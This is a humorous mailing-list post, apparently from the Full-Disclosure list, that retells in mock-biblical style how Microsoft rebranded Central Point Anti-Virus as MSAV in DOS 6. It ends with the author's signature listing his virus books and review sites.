Ah, how soon they forget. (Kids these days ...) Heck, *I* forget. Was it Windows 3.0 or 3.1? Anyway, DOS 6. And lo, Microsoft went forth unto the land, and spake unto the makers of AV, and did say, who will give unto us their product for cheap, that we may call it by our name, and all geeks may use of it, and bless our name. And the makers of AV muttered amungst themselves, and said, and if we do this, what shall it profit us? And Microsoft spake unto them saying, are ye not the makers of endless upgrades? And shall ye not sell these upgrades unto those who have need of them since all will have thine product even though it be called by our name? And lo, Central Point did underbid all the others. And Microsoft did take unto itself CPAV, and call it MSAV, and all those who purchased DOS 6 did partake of it, and thought that it was good. But none knew that they needed to upgrade it. And then came unto Microsoft and Central Point the shame of the 14 bytes, and geeks despised them. And Central Point was cast into Gehenna, or Symantec, which is the same thing. [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Find virus, book info http://victoria.tc.ca/techrev/rms.htm Mirrored at http://sun.soci.niu.edu/~rslade/rms.htm Review mailing list: send mail to [EMAIL PROTECTED] Robert Slade's Guide to Computer Viruses, 0-387-94663-2 (800-SPRINGER) Viruses Revealed 0072130903 Software Forensics (forthcoming) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
